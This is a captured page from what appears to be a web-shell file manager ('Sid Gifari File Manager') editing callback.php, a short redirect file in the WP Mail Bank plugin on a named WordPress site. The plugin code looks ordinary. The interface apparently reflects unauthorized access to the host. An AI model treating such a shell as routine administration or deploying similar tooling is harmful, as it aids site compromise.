Sid Gifari File Manager
🏠 Root
/
home
/
holapaeltv
/
www
/
wp-content
/
plugins
/
wp-mail-bank
/
lib
/
📝 Editing: callback.php
<?php /** * This file is used for handling redirection. * * @author Tech Banker * @package wp-mail-bank/lib * @version 2.0.0 */ if ( ! defined( 'ABSPATH' ) ) { exit; } // Exit if accessed directly $code = isset( $_REQUEST['code'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['code'] ) ) : ''; // WPCS: CSRF ok, WPCS: input var ok. $url = admin_url( "admin.php?page=mb_email_configuration&access_token=$code" ); header( "location: $url" ); exit();
💾 Save
❌ Cancel
Sid Gifari File Manager v1.0 | Terminal Auto-Sync Enabled | Current Path: /home/holapaeltv/www/wp-content/plugins/wp-mail-bank/lib